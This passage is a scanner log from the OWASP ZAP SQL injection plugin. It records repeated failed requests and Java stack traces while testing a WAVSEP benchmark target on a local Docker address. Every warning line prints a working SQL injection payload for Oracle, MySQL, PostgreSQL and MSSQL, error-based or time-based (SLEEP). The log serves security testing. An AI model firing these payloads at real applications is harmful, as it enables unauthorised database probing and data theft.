org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680248 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 6006=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6006=6006) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (5451=5451] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 6006=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6006=6006) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (5451=5451 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680249 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7951=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7951=7951) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 7951=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7951=7951) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680250 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 5877=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5877=5877) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('Zjtd'='Zjtd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 5877=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5877=5877) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('Zjtd'='Zjtd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680252 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 8937=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8937=8937) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'JrFT'='JrFT] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 8937=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8937=8937) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'JrFT'='JrFT at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680254 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 5553=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5553=5553) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 5553=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5553=5553) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680255 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2099=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2099=2099) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- hzYf] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 2099=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2099=2099) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- hzYf at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680256 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 8407 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8407=8407,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT 8407 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8407=8407,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680257 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(1706=1706,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(1706=1706,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680258 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2493=2493) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2493=2493) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680259 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2370=2370) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2370=2370) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680261 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);(SELECT * FROM (SELECT(SLEEP(5)))WFQl)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);(SELECT * FROM (SELECT(SLEEP(5)))WFQl)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680262 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;(SELECT * FROM (SELECT(SLEEP(5)))mdZC)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;(SELECT * FROM (SELECT(SLEEP(5)))mdZC)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at 